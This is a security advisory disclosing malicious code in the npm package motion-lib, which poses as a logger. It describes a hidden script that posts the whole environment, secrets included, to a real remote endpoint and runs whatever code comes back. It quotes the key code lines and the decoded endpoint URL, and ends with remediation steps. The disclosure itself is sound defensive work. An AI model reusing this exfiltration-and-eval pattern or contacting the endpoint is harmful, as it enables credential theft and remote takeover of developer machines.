
MAL-2026-5925

Malicious code in motion-lib (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (0dec07d83d6427eb2c76e0ab74e5f31f424e769c187e6d48df0de3575df2e176)

motion-lib@2.3.5 masquerades as a pino-style logger (exports `module.exports.pino`, ships proto.js/multistream.js/transport.js/redaction.js/levels.js, advertises the 'fast', 'logger', 'stream' and 'json' keywords), but its middleware factory in index.js spawns a detached `node lib/initializeCaller.js`.

That script shadows `process` with a local object whose `env.DEV_API_KEY` holds a base64-encoded string that decodes to https://ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df. It then POSTs the host's full real `process.env` to that endpoint with the header `x-secret-header: secret` (`axios.post(apiEndpoint, {...process.env }, ...)`). The HTTP response body is executed via `new Function('require', response.data); executor(require);`, giving the remote endpoint arbitrary code execution with full Node capabilities (filesystem, network, child_process) on the installer's machine.

The combination of full-environment exfiltration (AWS_*, GITHUB_TOKEN, NPM_TOKEN, CI secrets, DB credentials), eval-of-remote-response RCE, base64 obfuscation of the C2 URL, and impersonation of a popular logger package is an unambiguous supply-chain attack.


Affected packages

npm / motion-lib

No fixed version has been published for motion-lib (npm). The report identifies motion-lib@2.3.5 as malicious and names no version as safe, so remove the package, or pin only to a version you have inspected yourself, or switch to an alternative. Because the payload sends the host's full `process.env` to a remote endpoint and executes whatever comes back, treat every developer machine and CI runner that installed it as compromised and rotate the credentials that were present in its environment (AWS_*, GITHUB_TOKEN, NPM_TOKEN, CI and database secrets).
